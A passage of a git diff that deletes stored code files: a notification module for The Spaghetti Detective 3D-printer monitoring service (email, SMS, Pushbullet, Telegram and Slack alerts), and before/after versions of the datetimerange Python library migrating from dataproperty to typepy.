send_failure_alert(printer, is_warning=True, print_paused=False): - LOGGER.info(f'Printer {printer.user.id} {"smells fishy" if is_warning else "is probably failing"}. Sending Alerts') - if not printer.current_print: - LOGGER.warn(f'Trying to alert on printer without current print. 
printer_id: {printer.id}') - return - - (_, rotated_jpg_url) = save_print_snapshot( - printer.current_print, - last_pic_of_print(printer.current_print, 'tagged'), - unrotated_jpg_path=None, - rotated_jpg_path=f'snapshots/{printer.id}/{printer.current_print.id}/{str(timezone.now().timestamp())}_rotated.jpg') - - # Calls wrapped in individual try/except because anyone of them could fail, and we still want the flow to continue - - try: - if printer.user.alert_by_email: - send_failure_alert_email(printer, rotated_jpg_url, is_warning, print_paused) - except: - capture_exception() - - try: - send_failure_alert_pushbullet(printer, rotated_jpg_url, is_warning, print_paused) - except: - capture_exception() - - try: - send_failure_alert_telegram(printer, rotated_jpg_url, is_warning, print_paused) - except: - capture_exception() - - try: - if printer.user.is_pro and printer.user.alert_by_sms: - send_failure_alert_sms(printer, is_warning, print_paused) - except: - capture_exception() - - try: - if printer.user.is_pro: - send_failure_alert_slack(printer, rotated_jpg_url, is_warning, print_paused) - except: - capture_exception() - - -def send_failure_alert_email(printer, rotated_jpg_url, is_warning, print_paused): - if not settings.EMAIL_HOST: - LOGGER.warn("Email settings are missing. Ignored send requests") - return - - subject = 'Your print {} on {} {}.'.format( - printer.current_print.filename or '', - printer.name, - 'smells fishy' if is_warning else 'is probably failing') - - ctx = { - 'printer': printer, - 'print_paused': print_paused, - 'is_warning': is_warning, - 'view_link': site.build_full_url('/printers/'), - 'cancel_link': site.build_full_url('/prints/{}/cancel/'.format(printer.current_print_id)), - 'resume_link': site.build_full_url('/prints/{}/resume/'.format(printer.current_print_id)), - } - - send_email( - user=printer.user, - subject=subject, - mailing_list='alert', - template_path='email/failure_alert.html', - ctx=ctx, - img_url=rotated_jpg_url, - ) - - -def send_failure_alert_sms(printer, is_warning, print_paused): - if not settings.TWILIO_ENABLED: - LOGGER.warn("Twilio settings are missing. Ignored send requests") - return - - if not printer.user.sms_eligible(): - return - - to_number = printer.user.phone_country_code + printer.user.phone_number - - pausing_msg = '' - if print_paused: - pausing_msg = 'Printer is paused. ' - elif printer.action_on_failure == Printer.PAUSE and is_warning: - pausing_msg = 'Printer is NOT paused. ' - - msg = 'The Spaghetti Detective - Your print {} on {} {}. {}Go check it at: {}'.format( - printer.current_print.filename or '', - printer.name, - 'smells fishy' if is_warning else 'is probably failing', - pausing_msg, - site.build_full_url('/')) - - send_sms(msg, to_number) - - -def send_failure_alert_pushbullet(printer, rotated_jpg_url, is_warning, print_paused): - if not printer.user.has_valid_pushbullet_token(): - return - - pausing_msg = '' - if print_paused: - pausing_msg = 'Printer is paused.' - elif printer.action_on_failure == Printer.PAUSE and is_warning: - pausing_msg = 'Printer is NOT paused because The Detective is not very sure about it.' - - pb = Pushbullet(printer.user.pushbullet_access_token) - title = 'The Spaghetti Detective - Failure alert!' 
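- # The push below is best-effort: snapshot-upload errors are swallowed, and when
- # no image URL is available the alert falls back to pb.push_link().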
- - msg = 'Your print {} on {} {}.'.format( - printer.current_print.filename or '', - printer.name, - 'smells fishy' if is_warning else 'is probably failing') - link = site.build_full_url('/') - body = '{}\n{}\nGo check it at: {}'.format(msg, pausing_msg, link) - - try: - file_url = None - try: - file_url = rotated_jpg_url - if not ipaddress.ip_address(urlparse(file_url).hostname).is_global: - pb.upload_file(requests.get(file_url).content, 'Detected Failure.jpg') - except: - pass - - if file_url: - pb.push_file(file_url=file_url, file_name="Detected Failure.jpg", file_type="image/jpeg", body=body, title=title) - else: - pb.push_link(title, link, body) - except (PushError, PushbulletError) as e: - LOGGER.error(e) - - -def send_failure_alert_telegram(printer, rotated_jpg_url, is_warning, print_paused): - if not printer.user.telegram_chat_id: - return - - try: - photo = requests.get(rotated_jpg_url).content - except: - photo = None - - action = '' - button_list = ['more_info'] - if print_paused: - action = 'The print is paused.' - button_list = ['cancel', 'resume', 'do_not_ask', 'more_info'] - elif printer.action_on_failure == Printer.PAUSE and is_warning: - action = 'Printer is NOT paused because The Detective is not very sure about it.' - button_list = ['cancel', 'more_info'] - - notification_text = f"""Hi {printer.user.first_name or ''}, - -_The Spaghetti Detective_ spotted some suspicious activity on your printer *{printer.name}*. - -{action}""" - - try: - send_telegram_notification(printer, notification_text, photo, buttons=button_list) - except requests.ConnectionError as e: - LOGGER.error(e) - - -def send_failure_alert_slack(printer, rotated_jpg_url, is_warning, print_paused): - if not printer.user.slack_access_token: - return - - req = requests.get( - url='https://slack.com/api/conversations.list', - params={ - 'token': printer.user.slack_access_token, - 'types': 'public_channel,private_channel' - }) - req.raise_for_status() - slack_channel_ids = [c['id'] for c in req.json()['channels'] if c['is_member']] - - for slack_channel_id in slack_channel_ids: - msg = { - "channel": slack_channel_id, - "blocks": [ - { - "type": "section", - "text": { - "type": "mrkdwn", - "text": f"*The Spaghetti Detective - Failure alert*\n\nYour print {printer.current_print.filename or ''} on {printer.name} {'smells fishy' if is_warning else 'is probably failing'}.\nThe printer is {'paused' if print_paused else 'NOT paused'}.\n<{site.build_full_url('/printers/')}|Check it out.>" - } - } - ] - } - try: - msg['blocks'].append( - { - "type": "image", - "image_url": rotated_jpg_url, - "alt_text": "Print snapshot" - } - ) - except: - pass - - req = requests.post( - url='https://slack.com/api/chat.postMessage', - headers={'Authorization': f'Bearer {printer.user.slack_access_token}'}, - json=msg - ) - req.raise_for_status() - - -def send_print_notification(_print, extra_ctx={}): - if _print.is_canceled(): - if not _print.printer.user.notify_on_canceled: - return - else: - if not _print.printer.user.notify_on_done: - return - - # Calls wrapped in individual try/except because anyone of them could fail, and we still want the flow to continue - - try: - if _print.printer.user.print_notification_by_email: - send_print_notification_email(_print, extra_ctx) - except: - capture_exception() - - try: - if _print.printer.user.print_notification_by_pushbullet: - send_print_notification_pushbullet(_print) - except: - capture_exception() - - try: - if _print.printer.user.print_notification_by_telegram: - 
send_print_notification_telegram(_print) - except: - capture_exception() - - try: - if _print.printer.user.is_pro: - send_print_notification_slack(_print) - except: - capture_exception() - - -def send_print_notification_email(_print, extra_ctx={}): - subject = f'{_print.filename} is canceled.' if _print.is_canceled() else f'🙌 {_print.filename} is ready.' - ctx = { - 'print': _print, - 'print_time': str(_print.ended_at() - _print.started_at).split('.')[0], - 'timelapse_link': site.build_full_url(f'/prints/{_print.id}/'), - } - ctx.update(extra_ctx) - send_email( - user=_print.printer.user, - subject=subject, - mailing_list='print_notification', - template_path='email/print_notification.html', - ctx=ctx, - img_url=_print.poster_url, - ) - - -def send_print_notification_telegram(_print): - if not _print.printer.user.telegram_chat_id: - return - - try: - photo = requests.get(_print.poster_url).content - except: - photo = None - - notification_text = f"""Hi {_print.printer.user.first_name or ''}, - -Your print job *{_print.filename}* {'has been canceled' if _print.is_canceled() else 'is done'} on printer {_print.printer.name}. -""" - try: - send_telegram_notification(_print.printer, notification_text, photo) - except requests.ConnectionError as e: - LOGGER.error(e) - - -def send_print_notification_pushbullet(_print): - if not _print.printer.user.has_valid_pushbullet_token(): - return - - pb = Pushbullet(_print.printer.user.pushbullet_access_token) - - title = 'The Spaghetti Detective - Print job notification' - link = site.build_full_url('/') - body = f"Your print job {_print.filename} {'has been canceled' if _print.is_canceled() else 'is done'} on printer {_print.printer.name}." - file_url = None - try: - file_url = _print.poster_url - if not ipaddress.ip_address(urlparse(file_url).hostname).is_global: - pb.upload_file(requests.get(file_url).content, 'Snapshot.jpg') - except: - pass - - try: - if file_url: - pb.push_file(file_url=file_url, file_name="Snapshot.jpg", file_type="image/jpeg", body=body, title=title) - else: - pb.push_link(title, link, body) - except (PushError, PushbulletError) as e: - LOGGER.error(e) - - -def send_print_notification_slack(_print): - if not _print.printer.user.slack_access_token: - return - - req = requests.get( - url='https://slack.com/api/conversations.list', - params={ - 'token': _print.user.slack_access_token, - 'types': 'public_channel,private_channel' - }) - req.raise_for_status() - slack_channel_ids = [c['id'] for c in req.json()['channels'] if c['is_member']] - - for slack_channel_id in slack_channel_ids: - msg = { - "channel": slack_channel_id, - "blocks": [ - { - "type": "section", - "text": { - "type": "mrkdwn", - "text": f"*The Spaghetti Detective - Print job notification*\n\n*G-Code*: {_print.filename} \n*Status*: {'Canceled' if _print.is_canceled() else 'Finished'}\n*Printer*: <{site.build_full_url('/printers/')}|{_print.printer.name}>" - } - } - ] - } - if _print.poster_url: - msg['blocks'].append( - { - "type": "image", - "image_url": _print.poster_url, - "alt_text": "Print snapshot" - } - ) - - req = requests.post( - url='https://slack.com/api/chat.postMessage', - headers={'Authorization': f'Bearer {_print.user.slack_access_token}'}, - json=msg - ) - req.raise_for_status() - - -# Helpers -@backoff.on_exception(backoff.expo, - (smtplib.SMTPServerDisconnected, - smtplib.SMTPSenderRefused, - smtplib.SMTPResponseException,), - max_tries=3) -def send_email(user, subject, mailing_list, template_path, ctx, img_url=None, verified_only=True, 
attachment=None): - if not settings.EMAIL_HOST: - LOGGER.warn("Email settings are missing. Ignored send requests") - return - - attachments = [] - if img_url: - # https://github.com/TheSpaghettiDetective/TheSpaghettiDetective/issues/43 - try: - if not ipaddress.ip_address(urlparse(img_url).hostname).is_global: - attachments = [('Image.jpg', requests.get(img_url).content, 'image/jpeg')] - except: - pass - - ctx['img_url'] = None if attachments else img_url - - # By default email verification should be required for notifications but - # maybe users will want to disable it on private servers - if settings.ACCOUNT_EMAIL_VERIFICATION != 'none' and verified_only: - emails = EmailAddress.objects.filter(user=user, verified=True) - else: - emails = EmailAddress.objects.filter(user=user) - - unsub_url = site.build_full_url(f'/unsubscribe_email/?unsub_token={user.unsub_token}&list={mailing_list}') - for email in emails: - ctx['unsub_url'] = unsub_url - message = get_template(template_path).render(ctx) - msg = EmailMessage( - subject, - message, - to=(email.email,), - from_email=settings.DEFAULT_FROM_EMAIL, - attachments=attachments, - headers={'List-Unsubscribe': f'<{unsub_url}>, '},) - msg.content_subtype = 'html' - if attachment: - msg.attach_file(attachment) - msg.send() - - -def send_sms(msg, to_number): - twilio_client = Client(settings.TWILIO_ACCOUNT_SID, settings.TWILIO_AUTH_TOKEN) - from_number = settings.TWILIO_FROM_NUMBER - - twilio_client.messages.create(body=msg, to=to_number, from_=from_number) diff --git a/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.diff b/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.diff deleted file mode 100644 index d2e5ab1..0000000 --- a/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.diff +++ /dev/null @@ -1,73 +0,0 @@ -diff --git a/datetimerange/__init__.py b/datetimerange/__init__.py - index 10659da2b1812cbec4d218b71582f73029c62fb7..936761f779c4f7dc8c2d4c03c47b6e7b6e978a89 100644 - --- a/datetimerange/__init__.py - +++ b/datetimerange/__init__.py -@@ -6,10 +6,12 @@ - - from __future__ import division - from __future__ import unicode_literals -+ - import datetime - --import dataproperty as dp - import dateutil.parser -+import typepy -+ - import dateutil.relativedelta as rdelta - - -@@ -437,6 +439,7 @@ class DateTimeRange(object): - Set the start time of the time range. - - :param datetime.datetime/str value: |param_start_datetime| -+ :raises ValueError: If the value is invalid as a datetime value. - - :Examples: - -@@ -454,16 +457,22 @@ class DateTimeRange(object): - 2015-03-22T10:00:00+0900 - NaT - """ - -- data_prop = dp.DataProperty( -- value, strict_type_mapping=dp.NOT_STRICT_TYPE_MAPPING) -- self.__validate_value(data_prop) -- self.__start_datetime = data_prop.data -+ if value is None: -+ self.__start_datetime = None -+ return -+ -+ try: -+ self.__start_datetime = typepy.type.DateTime( -+ value, strict_level=typepy.StrictLevel.MIN).convert() -+ except typepy.TypeConversionError as e: -+ raise ValueError(e) - - def set_end_datetime(self, value): - """ - Set the end time of the time range. - - :param datetime.datetime/str value: |param_end_datetime| -+ :raises ValueError: If the value is invalid as a datetime value. 
- - :Examples: - -@@ -481,10 +490,15 @@ class DateTimeRange(object): - NaT - 2015-03-22T10:10:00+0900 - """ - -- data_prop = dp.DataProperty( -- value, strict_type_mapping=dp.NOT_STRICT_TYPE_MAPPING) -- self.__validate_value(data_prop) -- self.__end_datetime = data_prop.data -+ if value is None: -+ self.__end_datetime = None -+ return -+ -+ try: -+ self.__end_datetime = typepy.type.DateTime( -+ value, strict_level=typepy.StrictLevel.MIN).convert() -+ except typepy.TypeConversionError as e: -+ raise ValueError(e) - - def set_time_range(self, start, end): - """ diff --git a/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.source.py b/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.source.py deleted file mode 100644 index 79133f2..0000000 --- a/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.source.py +++ /dev/null @@ -1,737 +0,0 @@ -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import division -from __future__ import unicode_literals -import datetime - -import dataproperty as dp -import dateutil.parser -import dateutil.relativedelta as rdelta - - -class DateTimeRange(object): - """ - The class that represents the time range. - - :param datetime.datetime/str start: |param_start_datetime| - :param datetime.datetime/str end: |param_end_datetime| - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range - - .. parsed-literal:: - - 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900 - - .. py:attribute:: start_time_format - - Conversion format string for :py:attr:`.start_datetime`. - - .. seealso:: :py:meth:`.get_start_time_str` - - .. py:attribute:: end_time_format - - Conversion format string for :py:attr:`.end_datetime`. - - .. seealso:: :py:meth:`.get_end_time_str` - """ - - NOT_A_TIME_STR = "NaT" - - def __init__( - self, start_datetime=None, end_datetime=None, - start_time_format="%Y-%m-%dT%H:%M:%S%z", - end_time_format="%Y-%m-%dT%H:%M:%S%z"): - - self.set_time_range(start_datetime, end_datetime) - - self.start_time_format = start_time_format - self.end_time_format = end_time_format - - self.is_output_elapse = False - self.separator = " - " - - def __repr__(self): - text_list = [ - self.get_start_time_str(), - self.get_end_time_str(), - ] - - if self.is_output_elapse: - suffix = " ({})".format(self.end_datetime - self.start_datetime) - else: - suffix = "" - - return self.separator.join(text_list) + suffix - - def __eq__(self, other): - return all([ - self.start_datetime == other.start_datetime, - self.end_datetime == other.end_datetime, - ]) - - def __ne__(self, other): - return any([ - self.start_datetime != other.start_datetime, - self.end_datetime != other.end_datetime, - ]) - - def __add__(self, other): - return DateTimeRange( - self.start_datetime + other, self.end_datetime + other) - - def __iadd__(self, other): - self.set_start_datetime(self.start_datetime + other) - self.set_end_datetime(self.end_datetime + other) - - return self - - def __sub__(self, other): - return DateTimeRange( - self.start_datetime - other, self.end_datetime - other) - - def __isub__(self, other): - self.set_start_datetime(self.start_datetime - other) - self.set_end_datetime(self.end_datetime - other) - - return self - - def __contains__(self, x): - """ - :param datetime.datetime/str x: - datetime or datetimerange to compare. 
- Parse and convert to datetime if the value type is ``str``. - :return: |True| if the ``x`` is within the time range - :rtype: bool - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print "2015-03-22T10:05:00+0900" in time_range - print "2015-03-22T10:15:00+0900" in time_range - time_range_smaller = DateTimeRange( - "2015-03-22T10:03:00+0900", "2015-03-22T10:07:00+0900") - print time_range_smaller in time_range - - .. parsed-literal:: - - True - False - - .. seealso:: - - :py:meth:`.validate_time_inversion` - """ - - self.validate_time_inversion() - - if isinstance(x, DateTimeRange): - return x.start_datetime >= self.start_datetime and x.end_datetime <= self.end_datetime - - try: - value = dateutil.parser.parse(x) - except (TypeError, AttributeError): - value = x - - return self.start_datetime <= value <= self.end_datetime - - @property - def start_datetime(self): - """ - :return: Start time of the time range. - :rtype: datetime.datetime - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.start_datetime - - .. parsed-literal:: - - datetime.datetime(2015, 3, 22, 10, 0, tzinfo=tzoffset(None, 32400)) - """ - - return self.__start_datetime - - @property - def end_datetime(self): - """ - :return: End time of the time range. - :rtype: datetime.datetime - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.end_datetime - - .. parsed-literal:: - - datetime.datetime(2015, 3, 22, 10, 10, tzinfo=tzoffset(None, 32400)) - """ - - return self.__end_datetime - - @property - def timedelta(self): - """ - :return: - (|attr_end_datetime| - |attr_start_datetime|) as |timedelta| - :rtype: datetime.timedelta - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.timedelta - - .. parsed-literal:: - - datetime.timedelta(0, 600) - """ - - return self.end_datetime - self.start_datetime - - def is_set(self): - """ - :return: - |True| if both |attr_start_datetime| and - |attr_end_datetime| were not |None|. - :rtype: bool - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range.is_set() - time_range.set_time_range( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.is_set() - - .. parsed-literal:: - - False - True - """ - - return all([ - self.start_datetime is not None, - self.end_datetime is not None, - ]) - - def validate_time_inversion(self): - """ - Check time inversion of the time range. - - :raises ValueError: - If |attr_start_datetime| is - bigger than |attr_end_datetime|. - :raises TypeError: - Any one of |attr_start_datetime| and |attr_end_datetime|, - or both is inappropriate datetime value. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:10:00+0900", "2015-03-22T10:00:00+0900") - try: - time_range.validate_time_inversion() - except ValueError: - print "time inversion" - - .. 
parsed-literal:: - - time inversion - """ - - if not self.is_set(): - # for python2/3 compatibility - raise TypeError - - if self.start_datetime > self.end_datetime: - message = "time inversion found: {:s} > {:s}".format( - str(self.start_datetime), str(self.end_datetime)) - raise ValueError(message) - - def is_valid_timerange(self): - """ - :return: - |True| if the time range is - not null and not time inversion. - :rtype: bool - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range.is_valid_timerange() - time_range.set_time_range( - "2015-03-22T10:20:00+0900", "2015-03-22T10:10:00+0900") - print time_range.is_valid_timerange() - time_range.set_time_range( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.is_valid_timerange() - - .. parsed-literal:: - - False - False - True - - .. seealso:: - - :py:meth:`.is_set` - :py:meth:`.validate_time_inversion` - """ - - try: - self.validate_time_inversion() - except (TypeError, ValueError): - return False - - return self.is_set() - - def is_intersection(self, x): - """ - :param DateTimeRange x: Value to compare - :return: |True| if intersect with ``x`` - :rtype: bool - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - x = DateTimeRange( - "2015-03-22T10:05:00+0900", "2015-03-22T10:15:00+0900") - time_range.is_intersection(x) - - .. parsed-literal:: - - True - """ - - import copy - - dtr = copy.deepcopy(self) - dtr.intersection(x) - - return dtr.is_set() - - def get_start_time_str(self): - """ - :return: - |attr_start_datetime| as |str| formatted with - |attr_start_time_format|. - Return |NaT| if invalid datetime or format. - :rtype: str - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.get_start_time_str() - time_range.start_time_format = "%Y/%m/%d %H:%M:%S" - print time_range.get_start_time_str() - - .. parsed-literal:: - - 2015-03-22T10:00:00+0900 - 2015/03/22 10:00:00 - """ - - try: - return self.start_datetime.strftime(self.start_time_format) - except AttributeError: - return self.NOT_A_TIME_STR - - def get_end_time_str(self): - """ - :return: - |attr_end_datetime| as a |str| formatted with - |attr_end_time_format|. - Return |NaT| if invalid datetime or format. - :rtype: str - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.get_end_time_str() - time_range.end_time_format = "%Y/%m/%d %H:%M:%S" - print time_range.get_end_time_str() - - .. parsed-literal:: - - 2015-03-22T10:10:00+0900 - 2015/03/22 10:10:00 - """ - - try: - return self.end_datetime.strftime(self.end_time_format) - except AttributeError: - return self.NOT_A_TIME_STR - - def get_timedelta_second(self): - """ - :return: (|attr_end_datetime| - |attr_start_datetime|) as seconds - :rtype: float - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.get_timedelta_second() - - .. parsed-literal:: - - 600.0 - """ - - return self.__get_timedelta_sec(self.timedelta) - - def set_start_datetime(self, value): - """ - Set the start time of the time range. 
- - :param datetime.datetime/str value: |param_start_datetime| - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range - time_range.set_start_datetime("2015-03-22T10:00:00+0900") - print time_range - - .. parsed-literal:: - - NaT - NaT - 2015-03-22T10:00:00+0900 - NaT - """ - - data_prop = dp.DataProperty( - value, strict_type_mapping=dp.NOT_STRICT_TYPE_MAPPING) - self.__validate_value(data_prop) - self.__start_datetime = data_prop.data - - def set_end_datetime(self, value): - """ - Set the end time of the time range. - - :param datetime.datetime/str value: |param_end_datetime| - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range - time_range.set_end_datetime("2015-03-22T10:10:00+0900") - print time_range - - .. parsed-literal:: - - NaT - NaT - NaT - 2015-03-22T10:10:00+0900 - """ - - data_prop = dp.DataProperty( - value, strict_type_mapping=dp.NOT_STRICT_TYPE_MAPPING) - self.__validate_value(data_prop) - self.__end_datetime = data_prop.data - - def set_time_range(self, start, end): - """ - :param datetime.datetime/str start: |param_start_datetime| - :param datetime.datetime/str end: |param_end_datetime| - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range - time_range.set_time_range( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range - - .. parsed-literal:: - - NaT - NaT - 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900 - """ - - self.set_start_datetime(start) - self.set_end_datetime(end) - - @staticmethod - def __compare_relativedelta(lhs, rhs): - if lhs.years < rhs.years: - return -1 - if lhs.years > rhs.years: - return 1 - - if lhs.months < rhs.months: - return -1 - if lhs.months > rhs.months: - return 1 - - if lhs.days < rhs.days: - return -1 - if lhs.days > rhs.days: - return 1 - - if lhs.hours < rhs.hours: - return -1 - if lhs.hours > rhs.hours: - return 1 - - if lhs.minutes < rhs.minutes: - return -1 - if lhs.minutes > rhs.minutes: - return 1 - - if lhs.seconds < rhs.seconds: - return -1 - if lhs.seconds > rhs.seconds: - return 1 - - if lhs.microseconds < rhs.microseconds: - return -1 - if lhs.microseconds > rhs.microseconds: - return 1 - - return 0 - - def __compare_timedelta(self, lhs, seconds): - try: - rhs = datetime.timedelta(seconds=seconds) - - if lhs < rhs: - return -1 - if lhs > rhs: - return 1 - - return 0 - except TypeError: - return self.__compare_relativedelta( - lhs.normalized(), rdelta.relativedelta(seconds=seconds)) - - def range(self, step): - """ - Return an iterator object. - - :param datetime.timedelta/dateutil.relativedelta.relativedelta step: - Step of iteration. - :return: iterator - :rtype: iterator - - :Examples: - - .. code:: python - - import datetime - from datetimerange import DateTimeRange - - time_range = DateTimeRange( - "2015-01-01T00:00:00+0900", "2015-01-04T00:00:00+0900") - for value in time_range.range(datetime.timedelta(days=1)): - print value - - .. 
parsed-literal:: - - 2015-01-01 00:00:00+09:00 - 2015-01-02 00:00:00+09:00 - 2015-01-03 00:00:00+09:00 - 2015-01-04 00:00:00+09:00 - """ - - if self.__compare_timedelta(step, 0) == 0: - raise ValueError("step must be not zero") - - is_inversion = False - try: - self.validate_time_inversion() - except ValueError: - is_inversion = True - - if not is_inversion: - if self.__compare_timedelta(step, seconds=0) < 0: - raise ValueError( - "invalid step: expect greater than 0, actual={}".format( - step)) - else: - if self.__compare_timedelta(step, seconds=0) > 0: - raise ValueError( - "invalid step: expect less than 0, actual={}".format( - step)) - - current_datetime = self.start_datetime - while current_datetime <= self.end_datetime: - yield current_datetime - current_datetime = current_datetime + step - - def intersection(self, x): - """ - Newly set a time range that overlaps - the input and the current time range. - - :param DateTimeRange x: - Value to compute intersection with the current time range. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - x = DateTimeRange( - "2015-03-22T10:05:00+0900", "2015-03-22T10:15:00+0900") - time_range.intersection(x) - time_range - - .. parsed-literal:: - - 2015-03-22T10:05:00+0900 - 2015-03-22T10:10:00+0900 - """ - - self.validate_time_inversion() - x.validate_time_inversion() - - if any([ - x.start_datetime in self, - self.start_datetime in x, - ]): - self.set_start_datetime(max(self.start_datetime, x.start_datetime)) - self.set_end_datetime(min(self.end_datetime, x.end_datetime)) - else: - self.set_start_datetime(None) - self.set_end_datetime(None) - - def encompass(self, x): - """ - Newly set a time range that encompasses - the input and the current time range. - - :param DateTimeRange x: - Value to compute encompass with the current time range. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - x = DateTimeRange( - "2015-03-22T10:05:00+0900", "2015-03-22T10:15:00+0900") - time_range.encompass(x) - time_range - - .. parsed-literal:: - - 2015-03-22T10:00:00+0900 - 2015-03-22T10:15:00+0900 - """ - - self.validate_time_inversion() - x.validate_time_inversion() - - self.set_start_datetime(min(self.start_datetime, x.start_datetime)) - self.set_end_datetime(max(self.end_datetime, x.end_datetime)) - - def truncate(self, percentage): - """ - Truncate ``percentage`` / 2 [%] of whole time from first and last time. - - :param float percentage: Percentage of truncate. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.is_output_elapse = True - print time_range - time_range.truncate(10) - print time_range - - .. 
parsed-literal:: - - 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900 (0:10:00) - 2015-03-22T10:00:30+0900 - 2015-03-22T10:09:30+0900 (0:09:00) - """ - - self.validate_time_inversion() - - if percentage < 0: - raise ValueError( - "discard_percent must be greater or equal to zero: " + - str(percentage)) - - if percentage == 0: - return - - discard_time = self.timedelta // int(100) * int(percentage / 2) - - self.__start_datetime += discard_time - self.__end_datetime -= discard_time - - def __validate_value(self, data_prop): - if data_prop.typecode not in [dp.Typecode.DATETIME, dp.Typecode.NONE]: - raise ValueError("invalid datetime value: {}".format(data_prop)) - - @staticmethod - def __get_timedelta_sec(dt): - return int( - dt.days * 60 ** 2 * 24 + float(dt.seconds) + - dt.microseconds / (1000.0 ** 2)) diff --git a/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.target.py b/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.target.py deleted file mode 100644 index bea3fbc..0000000 --- a/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.target.py +++ /dev/null @@ -1,751 +0,0 @@ -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import division -from __future__ import unicode_literals - -import datetime - -import dateutil.parser -import typepy - -import dateutil.relativedelta as rdelta - - -class DateTimeRange(object): - """ - The class that represents the time range. - - :param datetime.datetime/str start: |param_start_datetime| - :param datetime.datetime/str end: |param_end_datetime| - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range - - .. parsed-literal:: - - 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900 - - .. py:attribute:: start_time_format - - Conversion format string for :py:attr:`.start_datetime`. - - .. seealso:: :py:meth:`.get_start_time_str` - - .. py:attribute:: end_time_format - - Conversion format string for :py:attr:`.end_datetime`. - - .. 
seealso:: :py:meth:`.get_end_time_str` - """ - - NOT_A_TIME_STR = "NaT" - - def __init__( - self, start_datetime=None, end_datetime=None, - start_time_format="%Y-%m-%dT%H:%M:%S%z", - end_time_format="%Y-%m-%dT%H:%M:%S%z"): - - self.set_time_range(start_datetime, end_datetime) - - self.start_time_format = start_time_format - self.end_time_format = end_time_format - - self.is_output_elapse = False - self.separator = " - " - - def __repr__(self): - text_list = [ - self.get_start_time_str(), - self.get_end_time_str(), - ] - - if self.is_output_elapse: - suffix = " ({})".format(self.end_datetime - self.start_datetime) - else: - suffix = "" - - return self.separator.join(text_list) + suffix - - def __eq__(self, other): - return all([ - self.start_datetime == other.start_datetime, - self.end_datetime == other.end_datetime, - ]) - - def __ne__(self, other): - return any([ - self.start_datetime != other.start_datetime, - self.end_datetime != other.end_datetime, - ]) - - def __add__(self, other): - return DateTimeRange( - self.start_datetime + other, self.end_datetime + other) - - def __iadd__(self, other): - self.set_start_datetime(self.start_datetime + other) - self.set_end_datetime(self.end_datetime + other) - - return self - - def __sub__(self, other): - return DateTimeRange( - self.start_datetime - other, self.end_datetime - other) - - def __isub__(self, other): - self.set_start_datetime(self.start_datetime - other) - self.set_end_datetime(self.end_datetime - other) - - return self - - def __contains__(self, x): - """ - :param datetime.datetime/str x: - datetime or datetimerange to compare. - Parse and convert to datetime if the value type is ``str``. - :return: |True| if the ``x`` is within the time range - :rtype: bool - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", 